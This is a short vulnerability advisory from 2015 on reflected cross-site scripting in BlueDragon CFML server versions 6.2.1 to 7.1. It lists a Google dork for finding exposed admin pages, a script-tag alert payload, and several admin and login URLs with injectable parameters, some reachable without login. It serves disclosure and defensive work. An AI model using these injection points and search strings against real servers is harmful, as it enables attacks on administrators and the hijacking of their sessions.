BlueDragon 6.2.1 / 7.0 / 7.1 Cross Site Scripting
Posted on 09 August 2015
I. VULNERABILITY BlueDragon 6.2.1, 7.0, 7.1 Reflected Cross-Site Scripting II. SOURCE: http://www.newatlanta.com/c/products/bluedragon/download/home III. BACKGROUND BlueDragon is a family of runtime server-side products for the deployment of ColdFusion Markup Language (CFML) pages - with native technology plataform integration on the operation system web server anda database of your choice. IV. NEW ATLANTA BUG TRACKING VULNERABILITY ID # 3435 VI. VENDOR RESPONSE V. TECHNICAL DETAILS # Exploit Title: BlueDragon Enterprise Server Multiple XSS Vulnerabilities # Google Dork: "BlueDragon Administration" # Date: 21/07/2015 # Author: www.newatlanta.com # Software Link: www.newatlanta.com/bluedragon/ # Version: 6.2.1, 7.0, 7.1 # Exploit Discovered : Glaysson Santos # Website : di9jun9.blogspot.com To reproduce this Flaw, put javascript XSS Payload (i.e:"><script>alert("0cn1")</script>) in the "XSS" bellow: - without authentication http://[TARGET]/bluedragon/admin.cfm?MESSAGE=XSS http://[TARGET]/bluedragon/login.cfm?MESSAGE=XSS - authenticated - affected scripts http:// [TARGET:PORT]/bluedragon/admin/collectionIndex.cfm?CollectionName=test.col&CollectionLanguage=XSS http:// [TARGET:PORT]/bluedragon/admin/caching.cfm?MESSAGE=XSS&ACTION=FLUSHFILECACHE http:// [TARGET:PORT]/bluedragon/admin/cfmapping_edit.cfm?STATUS=NOK&MESSAGE=XSS&ID=1&DNAME=/c:&isGlobal=XSS http://[TARGET:PORT]/bluedragon/admin/font.cfm?STATUS=OK&MESSAGE=XSS http://[TARGET:PORT]/bluedragon/admin/datasources_wizard1.cfm?MESSAGE=XSS The javascript will execute and display "0cn1" Greetings